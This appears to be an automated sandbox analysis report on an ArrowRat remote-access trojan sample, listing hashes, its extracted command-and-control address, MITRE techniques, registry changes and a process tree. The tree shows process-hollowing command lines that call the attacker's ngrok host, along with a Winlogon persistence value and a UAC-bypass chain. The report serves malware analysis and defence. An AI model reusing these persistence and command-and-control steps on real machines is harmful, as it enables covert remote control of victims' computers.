arrowrat | 279e15cb4ddbb440f1dbffe4f8af8430201971d59c1f40a58a12f81e4f59b342

Analysis

max time kernel
137s
max time network
31s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
22-05-2023 08:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Client.exe
Size

158KB
MD5

ae1a31fccddf3c728479e181ee16c74b
SHA1

767c87adcd18546e3ae40d781579071f7f8035a2
SHA256

279e15cb4ddbb440f1dbffe4f8af8430201971d59c1f40a58a12f81e4f59b342
SHA512

9343ad9da7db4a6f8eb2bd78505bcce18d026de7cdc520864090b130d8d395b0edfc26c456bb4ec554cbd7473ea8cb14302b5a4e91a2072f81f219c97cc81905
SSDEEP

3072:TbzmH+0OoCthfbEFtbcfjF45gjryKKqH6JY2doszEmQotEPPcfPP1O8Y:Tbzme0ODhTEPgnjuIJzo+PPcfPPY8

Score

10^/10

arrowrat client persistence rat

Malware Config

Extracted

Family

arrowrat

Botnet

Client

6.tcp.eu.ngrok.io:19154

Mutex

Runtime Broker

Signatures

ArrowRat
Remote access tool with various capabilities first seen in late 2021.
rat arrowrat

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Users\\Admin\\AppData\\Roaming\\ThcnSsICa\\XBIbIpjFB.exe"	Client.exe

Modifies Installed Components in the registry 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}	ie4uinit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\IsInstalled = "1"	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}	ie4uinit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\Locale = "*"	ie4uinit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\Version = "11,0,9600,0"	ie4uinit.exe

Registers COM server for autorun 1 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32	ie4uinit.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 51 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListTTL = "0"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.aifc	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.asx	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.m3u	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mp2	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mpv2	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wma	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wmd	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.3gp2	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.aac	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.asf	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.m4v	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.midi	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mp3	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mp4	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.rmi	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wmz	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.3gpp	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.adt	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mid	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wmx	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Capabilities	ie4uinit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Capabilities\Hidden = "0"	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\Main	ie4uinit.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.adts	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.aif	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.avi	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.m1v	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mpg	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wav	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wmv	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.3g2	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.au	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.m4a	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mp2v	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wvx	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mod	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mpe	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mpeg	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wpl	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.m2v	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mp4v	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wax	unregmp2.exe
Key created	\REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\BrowserEmulation	ie4uinit.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "4"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.3gp	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.aiff	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mov	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mpa	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.snd	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wm	unregmp2.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.m4a\MP2.Last = "Custom"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\printto\command	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\image\shellex\ContextMenuHandlers\PlayTo	unregmp2.exe
Key created	\REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000_CLASSES\ms-settings	Client.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.wma\OpenWithProgIds	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\video/x-ms-asf\Extension = ".asx"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.dvr-ms\OpenWithProgIds	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Microsoft.Website\ShellEx\PropertyHandler	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.3g2\ = "WMP11.AssocFile.3G2"	unregmp2.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\.avi\OpenWithProgIds\WMP11.AssocFile.AVI = "0"	unregmp2.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\.wmx\OpenWithProgIds\WMP11.AssocFile.ASX = "0"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-ms-wmd\CLSID = "{ee4da6a4-8c52-4a63-bbb8-97c93d7e1b6c}"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\opennew\command\DelegateExecute = "{17FE9752-0B5A-4665-84CD-569794602F5C}"	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.xhtml\Content Type = "application/xhtml+xml"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shellex\ContextMenuHandlers\PlayTo	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shell\Enqueue	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.asx	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WMP.DVD\Shell\Play\Command	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\https\DefaultIcon\ = "%SystemRoot%\\system32\\url.dll,0"	ie4uinit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\.3gpp\OpenWithProgIds\WMP11.AssocFile.3GP = "0"	unregmp2.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\.asf\OpenWithProgIds\WMP11.AssocFile.ASF = "0"	unregmp2.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\.WMS\OpenWithProgIds\WMP11.AssocFile.WMS = "0"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WMP11.AssocFile.ADTS	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\ = "opennew"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\InternetShortcut\shellex\IconHandler	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/x-midi\CLSID = "{cd3afa74-b84f-48f0-9393-7edc34128127}"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\video/msvideo	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.svg\OpenWithProgIds	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.3gp\ = "WMP11.AssocFile.3GP"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/x-wav\CLSID = "{cd3afa7b-b84f-48f0-9393-7edc34128127}"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WMP.AudioCD\Shell\Play\Command	unregmp2.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\.rmi\OpenWithProgIds\WMP11.AssocFile.MIDI = "0"	unregmp2.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mpv2\OpenWithProgIds\WMP11.AssocFile.MPEG = "0"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Applications\wmplayer.exe\SupportedTypes\.wms	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/mpeg\Extension = ".mp3"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/vnd.dlna.adts\Extension = ".adts"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mpeg\MPlayer2.BAK = "VLC.mpeg"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Video\shell\Enqueue	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mp2v	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Microsoft.Website	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.3g2\MPlayer2.BAK = "VLC.3g2"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.wma\MP2.Last = "Custom"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/x-mid\CLSID = "{cd3afa74-b84f-48f0-9393-7edc34128127}"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mms	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\http\shell\open	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\xhtmlfile\shell\open\command	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\InternetShortcut\shell\open	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.wmv\OpenWithProgIds	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/mid	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/mpg	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\https\shell\open\command	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mpa\OpenWithProgIds	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Play\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9801"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3DC7A020-0ACD-11CF-A9BB-00AA004AE837}	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Enqueue\command\DelegateExecute = "{45597c98-80f6-4549-84ff-752cf55e2d29}"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.3g2\MP2.Last = "Custom"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mpe\MPlayer2.BAK = "VLC.mpe"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/vnd.dlna.adts	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\xhtmlfile\shell\open\CommandId = "IE.File"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Video\shell\Enqueue\command	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\xhtmlfile\shell\printto\command\ = "\"C:\\Windows\\system32\\rundll32.exe\" \"C:\\Windows\\system32\\mshtml.dll\",PrintHTML \"%1\" \"%2\" \"%3\" \"%4\""	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Applications\wmplayer.exe\SupportedTypes\.mp4v	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.wm\ = "WMP11.AssocFile.ASF"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Applications\wmplayer.exe\SupportedTypes\.wma	unregmp2.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
1240	Client.exe
1240	Client.exe
1240	Client.exe
1240	Client.exe
1240	Client.exe
1240	Client.exe
1240	Client.exe
1240	Client.exe
1240	Client.exe
1240	Client.exe
1240	Client.exe
1240	Client.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

description	pid	Process
Token: SeDebugPrivilege	1240	Client.exe
Token: SeShutdownPrivilege	1164	explorer.exe
Token: SeShutdownPrivilege	1164	explorer.exe
Token: SeShutdownPrivilege	1164	explorer.exe
Token: SeShutdownPrivilege	1164	explorer.exe
Token: SeShutdownPrivilege	1164	explorer.exe
Token: SeShutdownPrivilege	1164	explorer.exe
Token: SeShutdownPrivilege	1164	explorer.exe
Token: SeShutdownPrivilege	1164	explorer.exe
Token: 33	1540	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1540	AUDIODG.EXE
Token: 33	1540	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1540	AUDIODG.EXE
Token: SeShutdownPrivilege	1164	explorer.exe
Token: SeShutdownPrivilege	1164	explorer.exe
Token: SeShutdownPrivilege	1164	explorer.exe
Token: SeShutdownPrivilege	1164	explorer.exe

Suspicious use of FindShellTrayWindow 28 IoCs

pid	Process
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1428	ComputerDefaults.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe

Suspicious use of SendNotifyMessage 19 IoCs

pid	Process
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe
1164	explorer.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1240	Client.exe

Suspicious use of WriteProcessMemory 55 IoCs

description	pid	Process	procid_target
PID 1240 wrote to memory of 1164	1240	Client.exe	27
PID 1240 wrote to memory of 1164	1240	Client.exe	27
PID 1240 wrote to memory of 1164	1240	Client.exe	27
PID 1240 wrote to memory of 868	1240	Client.exe	28
PID 1240 wrote to memory of 868	1240	Client.exe	28
PID 1240 wrote to memory of 868	1240	Client.exe	28
PID 1240 wrote to memory of 868	1240	Client.exe	28
PID 1240 wrote to memory of 568	1240	Client.exe	29
PID 1240 wrote to memory of 568	1240	Client.exe	29
PID 1240 wrote to memory of 568	1240	Client.exe	29
PID 1240 wrote to memory of 568	1240	Client.exe	29
PID 1240 wrote to memory of 580	1240	Client.exe	30
PID 1240 wrote to memory of 580	1240	Client.exe	30
PID 1240 wrote to memory of 580	1240	Client.exe	30
PID 1240 wrote to memory of 580	1240	Client.exe	30
PID 1240 wrote to memory of 668	1240	Client.exe	31
PID 1240 wrote to memory of 668	1240	Client.exe	31
PID 1240 wrote to memory of 668	1240	Client.exe	31
PID 1240 wrote to memory of 668	1240	Client.exe	31
PID 1240 wrote to memory of 472	1240	Client.exe	37
PID 1240 wrote to memory of 472	1240	Client.exe	37
PID 1240 wrote to memory of 472	1240	Client.exe	37
PID 1240 wrote to memory of 472	1240	Client.exe	37
PID 1240 wrote to memory of 1308	1240	Client.exe	36
PID 1240 wrote to memory of 1308	1240	Client.exe	36
PID 1240 wrote to memory of 1308	1240	Client.exe	36
PID 1240 wrote to memory of 1308	1240	Client.exe	36
PID 1240 wrote to memory of 1120	1240	Client.exe	35
PID 1240 wrote to memory of 1120	1240	Client.exe	35
PID 1240 wrote to memory of 1120	1240	Client.exe	35
PID 1240 wrote to memory of 1120	1240	Client.exe	35
PID 1240 wrote to memory of 332	1240	Client.exe	34
PID 1240 wrote to memory of 332	1240	Client.exe	34
PID 1240 wrote to memory of 332	1240	Client.exe	34
PID 1240 wrote to memory of 332	1240	Client.exe	34
PID 1240 wrote to memory of 1560	1240	Client.exe	33
PID 1240 wrote to memory of 1560	1240	Client.exe	33
PID 1240 wrote to memory of 1560	1240	Client.exe	33
PID 1240 wrote to memory of 1560	1240	Client.exe	33
PID 1240 wrote to memory of 1512	1240	Client.exe	32
PID 1240 wrote to memory of 1512	1240	Client.exe	32
PID 1240 wrote to memory of 1512	1240	Client.exe	32
PID 1240 wrote to memory of 1512	1240	Client.exe	32
PID 1164 wrote to memory of 1828	1164	explorer.exe	38
PID 1164 wrote to memory of 1828	1164	explorer.exe	38
PID 1164 wrote to memory of 1828	1164	explorer.exe	38
PID 1240 wrote to memory of 1428	1240	Client.exe	39
PID 1240 wrote to memory of 1428	1240	Client.exe	39
PID 1240 wrote to memory of 1428	1240	Client.exe	39
PID 1428 wrote to memory of 912	1428	ComputerDefaults.exe	41
PID 1428 wrote to memory of 912	1428	ComputerDefaults.exe	41
PID 1428 wrote to memory of 912	1428	ComputerDefaults.exe	41
PID 1428 wrote to memory of 1496	1428	ComputerDefaults.exe	42
PID 1428 wrote to memory of 1496	1428	ComputerDefaults.exe	42
PID 1428 wrote to memory of 1496	1428	ComputerDefaults.exe	42

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
1⤵
- Modifies WinLogon for persistence
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1240
- C:\Windows\explorer.exe
  "C:\Windows\explorer.exe"
  2⤵
  - Modifies Installed Components in the registry
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:1164
- - C:\Windows\system32\ctfmon.exe
    ctfmon.exe
    3⤵
    PID:1828
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 6.tcp.eu.ngrok.io 19154 Runtime Broker
  2⤵
  PID:868
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 6.tcp.eu.ngrok.io 19154 Runtime Broker
  2⤵
  PID:568
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 6.tcp.eu.ngrok.io 19154 Runtime Broker
  2⤵
  PID:580
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 6.tcp.eu.ngrok.io 19154 Runtime Broker
  2⤵
  PID:668
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 6.tcp.eu.ngrok.io 19154 Runtime Broker
  2⤵
  PID:1512
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 6.tcp.eu.ngrok.io 19154 Runtime Broker
  2⤵
  PID:1560
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 6.tcp.eu.ngrok.io 19154 Runtime Broker
  2⤵
  PID:332
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 6.tcp.eu.ngrok.io 19154 Runtime Broker
  2⤵
  PID:1120
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 6.tcp.eu.ngrok.io 19154 Runtime Broker
  2⤵
  PID:1308
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 6.tcp.eu.ngrok.io 19154 Runtime Broker
  2⤵
  PID:472
- C:\Windows\System32\ComputerDefaults.exe
  "C:\Windows\System32\ComputerDefaults.exe"
  2⤵
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:1428
- - C:\Windows\System32\ie4uinit.exe
    "C:\Windows\System32\ie4uinit.exe" -reinstall
    3⤵
    - Modifies Installed Components in the registry
    - Registers COM server for autorun
    - Modifies Internet Explorer settings
    - Modifies registry class
    PID:912
- - C:\Windows\system32\unregmp2.exe
    C:\Windows\system32\unregmp2.exe /SetWMPAsDefault
    3⤵
    - Modifies Internet Explorer settings
    - Modifies registry class
    PID:1496

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x574
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1540

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk

Filesize
1KB

MD5
21fb25bdede2db44cec42866d94ccc49

SHA1
fd7824cf84a6cb00120a82f3cfd175dda78c75e3

SHA256
d9d6056104788843b1f4b4a9dbd9ab2c7dab60082fb3adc747c6d756b30c6904

SHA512
c55cbd768d67db844aef8347de2193a4f05b986ccaeac578e13f8fe30156b44d9f699f4c48ad14f62dd248fe5d46669c128f4c837421037d82f74f25efef8a4f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk

Filesize
1KB

MD5
3b6c9bd85045c331bf3d38bd0949d564

SHA1
95637ee7af9f8fb252121843adfc295c24c05fa4

SHA256
6cc411a2e468daf61257910f39256d4e8028b71fb8634b342c6783fd38def7ba

SHA512
e5e63a40aefe343c105941113c33f2616f3504c08d978b1d329f67000d90e4184c4d46734cde13b5bb5590823bbcb7475ef9227de3feea955ff8a160518ef0f3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk

Filesize
1KB

MD5
b6fbd956832757c37e201cd35cdc2088

SHA1
af775ed37dce7f19351401c59bc73f8fae2b1ffd

SHA256
